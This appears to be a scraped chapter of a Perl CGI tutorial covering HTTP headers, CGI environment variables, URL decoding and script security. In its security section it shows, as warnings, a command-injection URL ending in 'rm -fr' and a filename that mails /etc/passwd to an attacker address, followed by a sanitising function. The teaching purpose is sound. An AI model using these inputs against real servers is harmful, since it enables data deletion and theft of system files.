📄 ch19.htm
字号:
<TR><TD WIDTH=166>Text</TD><TD WIDTH=238>Content Type: text/plain
</TD></TR>
<TR><TD WIDTH=166>HTML page</TD><TD WIDTH=238>Content Type: text/html
</TD></TR>
<TR><TD WIDTH=166>Gif graphic</TD><TD WIDTH=238>Content Type: image/gif
</TD></TR>
<TR><TD WIDTH=166>Redirection to another Web page</TD><TD WIDTH=238>Location: http://www.foobar.com
</TD></TR>
<TR><TD WIDTH=166>Cookie</TD><TD WIDTH=238>Set-cookie: ...</TD>
</TR>
<TR><TD WIDTH=166>Error Message</TD><TD WIDTH=238>Status: 402
</TD></TR>
</TABLE>
</CENTER>
<P>
<P>
All HTTP headers must be followed by a blank line. Use the following
line of code as a template:
<BLOCKQUOTE>
<PRE>
print("Content Type: text/html\n\n");
</PRE>
</BLOCKQUOTE>
<P>
Notice that the HTTP header is followed by <I>two</I> newline
characters. This is very important. It ensures that a blank line
will always follow the HTTP header.
<P>
If you have installed any helper applications for Netscape or
are familiar with MIME types, you already recognize the <TT>text/plain</TT>
and <TT>text/html</TT> parts of the
<TT>Content Type</TT> header. They
tell the remote Web browser what type of information you are sending.
The two most common MIME types to use are <TT>text/plain</TT>
and <TT>text/html</TT>.
<P>
The <TT>Location</TT> header is used
to redirect the client Web browser to another Web page. For example,
let's say that your CGI script is designed to randomly choose
from among 10 different URLs in order to determine the next Web
page to display. ONCe the new Web page is chosen, your program
outputs it like this:
<BLOCKQUOTE>
<PRE>
print("Location: $nextPage\n\n");
</PRE>
</BLOCKQUOTE>
<P>
ONCe the <TT>Location</TT> header
has been printed, nothing else should be printed. That is all
the information that the client Web browser needs.
<P>
Cookies and the <TT>Set-cookie:</TT>
header are discussed in the "Cookies" section later
in this chapter.
<P>
The last type of HTTP header is the <TT>Status</TT>
header. This header should be sent when an error arises in your
script that your program is not equipped to handle. I feel that
this HTTP header should not be used unless you are under severe
time pressure to complete a project. You should try to create
your own error handling routines that display a full Web page
that explains the error that happened and what the user can do
to fix or circumvent it. You might iNClude the time, date, type
of error, contact names and phone numbers, and any other information
that might be useful to the user. Relying on the standard error
messages of the Web server and browser will make your Web site
less user friendly.
<H2><A NAME="CGIandEnvironmentVariables"><FONT SIZE=5 COLOR=#FF0000>
CGI and Environment Variables</FONT></A></H2>
<P>
You are already familiar with environment variables if you read
<A HREF="ch12.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch12.htm" >Chapter 12</A>, "Using Special Variables." When your CGI
program is started, the Web server creates and initializes a number
of environment variables that your program can access using the
<TT>%ENV</TT> hash.
<P>
Table 19.2 contains a short description of each environment variable.
A complete description of the environmental variables used in
CGI programs can be found at
<BLOCKQUOTE>
<PRE>
http://www.ast.cam.ac.uk/~drtr/cgi-spec.html
<BR>
</PRE>
</BLOCKQUOTE>
<P>
<CENTER><B>Table 19.2 CGI Environment Variables</B></CENTER>
<p>
<CENTER>
<TABLE BORDERCOLOR=#000000 BORDER=1 WIDTH=80%>
<TR><TD WIDTH=199><I>Variable Name</I></TD><TD WIDTH=391><I>Description</I>
</TD></TR>
<TR><TD WIDTH=199>AUTH_TYPE</TD><TD WIDTH=391>Optionally provides the authentication protocol used to access your script if the local Web server supports authentication and if authentication was used to access your script.
</TD></TR>
<TR><TD WIDTH=199>CONTENT_LENGTH</TD><TD WIDTH=391>Optionally provides the length, in bytes, of the content provided to the script through the <TT>STDIN </TT>file handle. Used particularly in the <TT>POST</TT> method of form processing. See <A
HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing," for more information.
</TD></TR>
<TR><TD WIDTH=199>CONTENT_TYPE</TD><TD WIDTH=391>Optionally provides the type of content available from the <TT>STDIN</TT> file handle. This is used for the <TT>POST</TT> method of form processing. Most of the time, this variable will be blank and you can
assume a value of <TT>application/octet-stream</TT>.
</TD></TR>
<TR><TD WIDTH=199>GATEWAY_INTERFACE</TD><TD WIDTH=391>Provides the version of CGI supported by the local Web server. Most of the time, this will be equal to <TT>CGI/1.1</TT>.
</TD></TR>
<TR><TD WIDTH=199>HTTP_AccEPT</TD><TD WIDTH=391>Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file.
</TD></TR>
<TR><TD WIDTH=199>HTTP_FORM</TD><TD WIDTH=391>Provides the user's e-mail address. Not all Web browsers will supply this information to your server. Therefore, use this field only to provide a default value for an HTML form.
</TD></TR>
<TR><TD WIDTH=199>HTTP_USER_AGENT</TD><TD WIDTH=391>Provides the type and version of the user's Web browser. For example, the Netscape Web browser is called Mozilla.
</TD></TR>
<TR><TD WIDTH=199>PATH_INFO</TD><TD WIDTH=391>Optionally contains any extra path information from the HTTP request that invoked the script.
</TD></TR>
<TR><TD WIDTH=199>PATH_TRANSLATED</TD><TD WIDTH=391>Maps the script's virtual path (i.e., from the root of the server directory) to the physical path used to call the script.
</TD></TR>
<TR><TD WIDTH=199>QUERY_STRING</TD><TD WIDTH=391>Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information such as search keywords to CGI scripts.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_ADDR</TD><TD WIDTH=391>Contains the dotted decimal address of the user.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_HOST</TD><TD WIDTH=391>Optionally provides the domain name for the site that the user has connected from.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_IDENT</TD><TD WIDTH=391>Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow.
</TD></TR>
<TR><TD WIDTH=199>REMOTE_USER</TD><TD WIDTH=391>Optionally provides the name used by the user to access your secured script.
</TD></TR>
<TR><TD WIDTH=199>REQUEST_METHOD</TD><TD WIDTH=391>Usually contains either "GET" or "POST"-the method by which form information will be made available to your script. See <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing,"
for more information.
</TD></TR>
<TR><TD WIDTH=199>SCRIPT_NAME</TD><TD WIDTH=391>Contains the virtual path to the script.
</TD></TR>
<TR><TD WIDTH=199>SERVER_NAME</TD><TD WIDTH=391>Contains the configured hostname for the server.
</TD></TR>
<TR><TD WIDTH=199>SERVER_PORT</TD><TD WIDTH=391>Contains the port number that the local Web server software is listening on. The standard port number is 80.
</TD></TR>
<TR><TD WIDTH=199>SERVER_PROTOCOL</TD><TD WIDTH=391>Contains the version of the Web protocol this server uses. For example, <TT>HTTP/1.0</TT>.
</TD></TR>
<TR><TD WIDTH=199>SERVER_SOFTWARE</TD><TD WIDTH=391>Contains the name and version of the Web server software. For example, <TT>WebSite/1.1e</TT>.
</TD></TR>
</TABLE>
</CENTER>
<P>
<H2><A NAME="URLENCoding"><FONT SIZE=5 COLOR=#FF0000>
URL ENCoding</FONT></A></H2>
<P>
One of the limitations that the WWW organizations have placed
on the HTTP protocol is that the content of the commands, responses,
and data that are passed between client and server should be clearly
defined. It is sometimes difficult to tell simply from the context
whether a space character is a field delimiter or an actual space
character to add whitespace between two words.
<P>
To clear up the ambiguity, the URL eNCoding scheme was created.
Any spaces are converted into plus (<TT>+</TT>)
signs to avoid semantic ambiguities. In addition, special characters
or 8-bit values are converted into their hexadecimal equivalents
and prefaced with a percent sign (<TT>%</TT>).
For example, the string <TT>Davy Jones <dj@planet.net></TT>
is eNCoded as <TT>Davy+Jones+%3Cdj@planet.net%3E</TT>.
If you look closely, you see that the <TT><</TT>
character has been converted to <TT>%3C</TT>
and the <TT>></TT> character has
been coverted to <TT>%3E</TT>.
<P>
Your CGI script will need to be able to convert URL eNCoded information
back into its normal form. Fortunately, Listing 19.2 contains
a fuNCtion that will convert URL eNCoded.
<P>
<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE>
<I>Define the </I><TT><I>decodeURL()</I></TT><I>
fuNCtion.<BR>
Get the eNCoded string from the parameter array.<BR>
Translate all plus signs into spaces.<BR>
Convert character coded as hexadecimal digits into regular characters.
<BR>
Return the decoded string.</I>
</BLOCKQUOTE>
<HR>
<BLOCKQUOTE>
<B>Listing 19.2 19LST02.PL-How to Decode the URL ENCoding
<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<PRE>
sub decodeURL {
$_ = shift;
tr/+/ /;
s/%(..)/pack('c', hex($1))/eg;
return($_);
}
</PRE>
</BLOCKQUOTE>
<HR>
<P>
This fuNCtion will be used in <A HREF="ch20.htm" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/ch20.htm" >Chapter 20</A>, "Form Processing,"
to decode form information. It is presented here because canned
queries also use URL eNCoding.
<H2><A NAME="Security"><FONT SIZE=5 COLOR=#FF0000>
Security</FONT></A></H2>
<P>
CGI really has only one large security hole that I can see. If
you pass information that came from a remote site to an operating
system command, you are asking for trouble. I think an example
is needed to understand the problem because it is not obvious.
<P>
Suppose that you had a CGI script that formatted a directory listing
and generated a Web page that let visitors view the listing. In
addition, let's say that the name of the directory to display
was passed to your program using the <TT>PATH_INFO</TT>
environment variable. The following URL could be used to call
your program:
<BLOCKQUOTE>
<PRE>
http://www.foo.com/cgi-bin/dirlist.pl/docs
</PRE>
</BLOCKQUOTE>
<P>
Inside your program, the <TT>PATH_INFO</TT>
environment variable is set to <TT>docs</TT>.
In order to get the directory listing, all that is needed is a
call to the <TT>ls</TT> command in
UNIX or the <TT>dir</TT> command in
DOS. Everything looks good, right?
<P>
But what if the program was invoked with this command line?
<BLOCKQUOTE>
<PRE>
http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;
</PRE>
</BLOCKQUOTE>
<P>
Now, all of a sudden, you are faced with the possibility of files
being deleted because the semi-colon (;) lets multiple commands
be executed on one command line.
<P>
This same type of security hole is possible any time you try to
run an external command. You might be tempted to use the <TT>mail</TT>,
<TT>sendmail</TT>, or <TT>grep</TT>
commands to save time while writing your CGI program, but because
all of these programs are easily duplicated using Perl, try to
resist the temptation.
<P>
Another security hole is related to using external data to open
or create files. Some enterprising hacker could use <TT>"|
mail hacker@hacker.com < /etc/passwd"</TT> as the
filename to mail your password file or any other file to himself.
<P>
All of these security holes can be avoided by removing the dangerous
characters (like the | or pipe character).
<P>
<IMG SRC="pseudo.gif" tppabs="http://cheminf.nankai.edu.cn/~eb~/Perl%205%20By%20Example/pseudo.gif" BORDER=1 ALIGN=RIGHT><p>
<BLOCKQUOTE>
<I>Define the </I><TT><I>improveSecurity()</I></TT><I>
fuNCtion.<BR>
Copy the passed string into </I><TT><I>$_</I></TT><I>,
the default search space.<BR>
Protect against command-line options by removing </I><TT><I>-</I></TT><I>
and </I><TT><I>+</I></TT><I> characters.
<BR>
Additional protection against command-line options.<BR>
Convert all dangerous characters into harmless underscores.<BR>
Return the </I><TT><I>$_</I></TT><I>
variable.</I>
</BLOCKQUOTE>
<P>
Listing 19.3 shows how to remove dangerous characters.
<HR>
<BLOCKQUOTE>
<B>Listing 19.3 19LST03.PL-How to Remove Dangerous
Characters<BR>
</B>
</BLOCKQUOTE>
<BLOCKQUOTE>
<PRE>
sub improveSecurity {
$_ = shift;
s/\-+(.*)/\1/g;
s/(.*)[ \t]+\-(.*)/\1\2/g;
tr/\$\'\`\"\<\>\/\;\!\|/_/;
return($_);
}
</PRE>
</BLOCKQUOTE>
<HR>
<H2><A NAME="CGIwrapandSecurity"><FONT SIZE=5 COLOR=#FF0000>
CGIwrap and Security</FONT></A></H2>
<P>
CGIwrap (<B>http://wwwcgi.umr.edu/~cgiwrap/</B>) is a UNIX-based
utility written by Nathan Neulinger that lets general users run
CGI scripts without needing access to the server's <TT>cgi-bin</TT>
directory. Normally, all scripts must be located in the server's
main <TT>cgi-bin</TT> directory and
all run with the same UID (user ID) as the Web server. CGIwrap
performs various security checks on the scripts before changing
ID to match the owner of the script. All scripts are executed
with same the user ID as the user who owns them. CGIwrap works
with NCSA, Apache, CERN, Netsite, and probably any other UNIX
Web server.
<P>
Any files created by a CGI program are normally owned by the Web
server. This can cause a problem if you need to edit or remove
files created by CGI programs. You might have to ask the system
administrator for help because you lack the proper auhorization.
All CGI programs have the same system permissions as the Web server.
If you run your Web server under the root user ID-being either
very brave or very foolish-a CGI program could be tricked into
erasing the entire hard drive. CGIwrap provides a way around these
problems.
<P>
With CGIwrap, scripts are located in users' <TT>public_html/cgi-bin</TT>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -